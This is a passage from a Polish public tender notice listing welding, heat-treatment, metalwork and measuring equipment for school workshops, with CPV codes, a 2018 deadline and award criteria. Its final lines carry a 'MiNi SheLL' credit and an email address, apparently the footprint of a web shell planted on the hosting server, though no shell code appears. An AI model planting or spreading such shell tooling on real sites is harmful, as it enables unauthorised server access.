TPP1 - 1 szt., gwarancja minimum 2 lata.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162110-9, 34110000-1, 34152000-7, 42662000-4, 44315100-2, 42661200-9, 44512000-2, 42652000-1, 43800000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-09-28<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>2</td><td><b>Nazwa: </b></td><td>Dostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni spawalnictwa i obróbki cieplnej</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>2.1 Spawarka MAG/MIG - 5 szt., gwarancja minimum 2 lata,2.2 Uchwyt spawalniczy - 4 szt., gwarancja minimum 2 lata,2.3 Uchwyt spawalniczy - 1 szt., gwarancja minimum 2 lata,2.4 Uchwyt spawalniczy do elektrody - 5 szt., gwarancja minimum 2 lata,2.5 Reduktor Argon/CO2 - 10 szt., gwarancja minimum 2 lata,2.6 Podgrzewacz gazu - 5 szt., gwarancja minimum 2 lata,2.7 Wąż gazowy - 1 szt., gwarancja minimum 2 lata,2.8 Młotek spawalniczy - 10 szt., gwarancja minimum 2 lata,2.9 Uchwyt magnetyczny uziemienia - 10 szt., gwarancja minimum 2 lata,2.10 Spawarka MAG/MIG - 1 szt., gwarancja minimum 2 lata,2.11 Łuski M36 - 10 szt., gwarancja minimum 2 lata,2.12 Końcówki prądowe - 100 szt., gwarancja minimum 2 lata,2.13 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.14 Stół spawalniczy - 1 szt., gwarancja minimum 2 lata,2.15 Zestaw oprzyrządowania stołu spawalniczego - 1 szt., gwarancja minimum 2 lata,2.16 Spawarka inwertorowa - 1 szt., gwarancja minimum 2 lata,2.17 Elektroda - 1 szt., gwarancja minimum 2 lata,2.18 Elektroda - 1 szt., gwarancja minimum 2 lata,2.19 Suszarka do elektrod - 1 szt., gwarancja minimum 2 lata,2.20 Przecinarka plazmowa - 1 szt., gwarancja minimum 2 lata,2.21 Zespół filtra powietrza - 1 szt., gwarancja minimum 2 lata,2.22 Zestaw cyrkla w kasecie - 1 szt., gwarancja minimum 2 lata,2.23 Cyrkiel standardowy - 1 szt., gwarancja minimum 2 lata,2.24 Cyrkiel z magnesem - 1 szt., gwarancja minimum 2 lata,2.25 Prowadnik prostoliniowy z magnesem - 1 szt., gwarancja minimum 2 lata,2.26 Elektrody do cięcia - 10 szt., gwarancja minimum 2 lata,2.27 Dysze - 10 szt., gwarancja minimum 2 lata,2.28 Rękawice spawalnicze - 10 par, gwarancja minimum 2 lata,2.29 Fartuchy spawalnicze - 10 szt., gwarancja minimum 2 lata,2.30 Tarcze spawalnicze - 10 szt., gwarancja minimum 2 lata,2.31 Przyłbica samościemniająca - 5 szt., gwarancja minimum 2 lata,2.32 Przyłbica samościemniająca z nawiewem - 1 szt., gwarancja minimum 2 lata,2.33 Szczotki stalowe - 10 szt., gwarancja minimum 2 lata,2.34 Filtry spawalnicze - 40 szt., gwarancja minimum 2 lata,2.35 Okulary ochronne - 10 szt., gwarancja minimum 2 lata,2.36 Wózek ręczny do przewożenia butli - 1 szt., gwarancja minimum 2 lata,2.37 Szlifierka kątowa 125 - 5 szt., gwarancja minimum 2 lata,2.38 Szafka narzędziowa z wyposażeniem - 1 szt., gwarancja minimum 2 lata,2.39 Szlifierka stołowa - 1 szt., gwarancja minimum 2 lata,2.40 Szlifierka stołowa dwutarczowa - 1 szt., gwarancja minimum 2 lata,2.41 Szlifierka do ostrzenia elektrod wolframowych - 1 szt., gwarancja minimum 2 lata,2.42 Tarcze szlifierskie - 1 opakowanie, gwarancja minimum 2 lata,2.43 Spoinomierz MS1 - 5 szt., gwarancja minimum 2 lata,2.44 Termokredki - 1 komplet, gwarancja minimum 2 lata,2.45 Pirometr - 1 szt., gwarancja minimum 2 lata,2.46 Środki antyodpryskowe - 10 szt., gwarancja minimum 2 lata,2.47 Pasta do dysz antyodpryskowa - 10 szt., gwarancja minimum 2 lata,2.48 Ceramic spray antyodpryskowy - 10 szt., gwarancja minimum 2 lata,2.49 Zmywacz do aluminium - 1 szt., gwarancja minimum 2 lata,2.50 Pasta do trawienia - 2 szt., gwarancja minimum 2 lata,2.51 Pędzel do pasty do trawienia - 4 szt., gwarancja minimum 2 lata,2.52 Penetrant - 5 szt., gwarancja minimum 2 lata,2.53 Zmywacz - 5 szt., gwarancja minimum 2 lata,2.54 Wywoływacz - 5 szt., gwarancja minimum 2 lata,2.55 Penetrant magnetyczny - 5 szt., gwarancja minimum 2 lata,2.56 Zmywacz magnetyczny - 5 szt., gwarancja minimum 2 lata,2.57 Wywoływacz magnetyczny - 5 szt., gwarancja minimum 2 lata,2.58 Podkładki ceramiczne - 1 komplet, gwarancja minimum 2 lata,2.59 Spawarka TIG AC/DC 300A - 5 szt., gwarancja minimum 2 lata,2.60 Uchwyt spawalniczy - 5 szt., gwarancja minimum 2 lata,2.61 Przewód masowy - 5 szt., gwarancja minimum 2 lata,2.62 Chłodnica - 5 szt., gwarancja minimum 2 lata,2.63 Tulejki zaciskowe - 1 komplet, gwarancja minimum 2 lata,2.64 Korek uchwytu - 10 szt., gwarancja minimum 2 lata,2.65 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.66 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.67 Elektrody wolframowe - 30 opakowań, gwarancja minimum 2 lata,2.68 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.69 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.70 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.71 Zestaw palników uniwersalnych do cięcia i spawania - 2 szt., gwarancja minimum 2 lata,2.72 Palnik do lutowania - 2 szt., gwarancja minimum 2 lata,2.73 Wąż tlenowy - 1 szt., gwarancja minimum 2 lata,2.74 Wąż acetylenowy - 1 szt., gwarancja minimum 2 lata,2.75 Reduktor tlenu - 1 szt., gwarancja minimum 2 lata,2.76 Reduktor acetylenu - 1 szt., gwarancja minimum 2 lata,2.77 Końcówka na wąż tlenowy z nakrętką - 1 szt., gwarancja minimum 2 lata,2.78 Końcówka na wąż acetylenowy z nakrętką - 1 szt., gwarancja minimum 2 lata,2.79 Bezpiecznik przypalnikowy do tlenu - 1 szt., gwarancja minimum 2 lata,2.80 Bezpiecznik przypalnikowy do acetylenu - 1 szt., gwarancja minimum 2 lata,2.81 Bezpiecznik przyreduktorowy do tlenu - 1 szt., gwarancja minimum 2 lata,2.82 Bezpiecznik przyreduktorowy do acetylenu - 1 szt., gwarancja minimum 2 lata,2.83 Szybkozłączka do tlenu - 1 szt., gwarancja minimum 2 lata,2.84 Szybkozłączka do acetylenu - 1 szt., gwarancja minimum 2 lata2.85 Wózek dwubutlowy - 1 szt., gwarancja minimum 2 lata,2.86 Drut spawalniczy - 1 szt., gwarancja minimum 2 lata,2.87 Okulary do spawania gazowego - 5 szt., gwarancja minimum 2 lata,2.88 Rozgałęziacz gazu - 4 szt., gwarancja minimum 2 lata,2.89 Spoiwo do lutowania - 1 szt., gwarancja minimum 2 lata,2.90 Pasta lutownicza - 2 szt., gwarancja minimum 2 lata,2.91 Układ wentylacyjny spawalniczy - 1 szt., gwarancja minimum 2 lata.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162110-9, 34110000-1, 34152000-7, 42662000-4, 44315100-2, 42661200-9, 44512000-2, 42652000-1, 43800000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-09-28<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/><table><tr><td><b>Część nr: </b></td><td>3</td><td><b>Nazwa: </b></td><td>Dostawa sprzętu i wyposażenia wraz z montażem i uruchomieniem pracowni obróbki ręcznej, remontu i montażu maszyn i urządzeń</td></tr></table><b>1) Krótki opis przedmiotu zamówienia </b><i> (wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego -określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>3.1 Wiertarka promieniowa - 1 szt., gwarancja minimum 2 lata,3.2 Wiertarka kadłubowa (słupowa) - 1 szt., gwarancja minimum 2 lata,3.3 Szlifierka ostrzałka - 2 szt., gwarancja minimum 2 lata,3.4 Nożyce dźwigniowe ręczne do cięcia blach - 2 szt., gwarancja minimum 2 lata,3.5 Stół ślusarski - 6 szt., gwarancja minimum 2 lata,3.6 Imadło ślusarskie ciężkie - 5 szt., gwarancja minimum 2 lata,3.7 Imadło ślusarskie typu szufladowego - 12 szt., gwarancja minimum 2 lata,3.8 Płyta traserska - 5 szt., gwarancja minimum 2 lata,3.9 Zaginarka do rur - 1 szt., gwarancja minimum 2 lata,3.10 Urządzenie do mycia - 1 szt., gwarancja minimum 2 lata,3.11 Prasa hydrauliczna z oprzyrządowaniem - 1 szt., gwarancja minimum 2 lata,3.12 Prasa montażowa ręczna z oprzyrządowaniem - 3 szt., gwarancja minimum 2 lata,3.13 Wózek narzędziowy 7-szuflad z wyposażeniem we wkładkach narzędziowych min. 266 szt. narzędzi - 3 szt., gwarancja minimum 2 lata,3.14 Zestaw narzędzi ślusarskich - 10 szt., gwarancja minimum 2 lata,3.15 Suwmiarka uniwersalna - 15 szt., gwarancja minimum 2 lata,3.16 Suwmiarka uniwersalna z odczytem cyfrowym - 5 szt., gwarancja minimum 2 lata,3.17 Mikrometry do pomiarów zewnętrznych - 3 komplety, gwarancja minimum 2 lata,3.18 Mikrometry do pomiarów wewnętrznych - 2 komplety, gwarancja minimum 2 lata,3.19 Kątomierz tarczowy z przesuwanym ramieniem - 6 szt., gwarancja minimum 2 lata,3.20 Kątomierz uniwersalny z lupką - 6 szt., gwarancja minimum 2 lata,3.21 Promieniomierz - 5 szt., gwarancja minimum 2 lata,3.22 Sprawdzian grzebieniowy do gwintów - 3 komplety, gwarancja minimum 2 lata,3.23 Klucz dynamometryczny - 2 szt., gwarancja minimum 2 lata,3.24 Szlifierka kątowa - 3 szt., gwarancja minimum 2 lata,3.25 Szlifierka kątowa - 2 szt., gwarancja minimum 2 lata,3.26 Zestaw do zgrzewania polifuzyjnego - 1 szt., gwarancja minimum 2 lata.<br/><b> 2) Wspólny Słownik Zamówień(CPV): </b>39162110-9, 34110000-1, 34152000-7, 42662000-4, 44315100-2, 42661200-9, 44512000-2, 42652000-1, 43800000-1<br/><br/><b> 3) Wartość części zamówienia(jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br/>Wartość bez VAT: <br/>Waluta: <br/><br/><b> 4) Czas trwania lub termin wykonania: </b><br/>okres w miesiącach: <br/>okres w dniach: <br/>data rozpoczęcia: <br/>data zakończenia: 2018-09-28<br/><b> 5) Kryteria oceny ofert: </b><br/><TABLE style="border: 1px solid black;border-collapse: collapse;"><tr><td style="border: 1px solid black;border-collapse: collapse;">Kryterium</td><td style="border: 1px solid black;border-collapse: collapse;">Znaczenie</td></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Cena</td><td style="border: 1px solid black;border-collapse: collapse;">60,00</TD></tr><TR><td style="border: 1px solid black;border-collapse: collapse;">Okres gwarancji</td><td style="border: 1px solid black;border-collapse: collapse;">40,00</TD></tr></TABLE><br/><b>6) INFORMACJE DODATKOWE:</b><br/><br/><br/> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com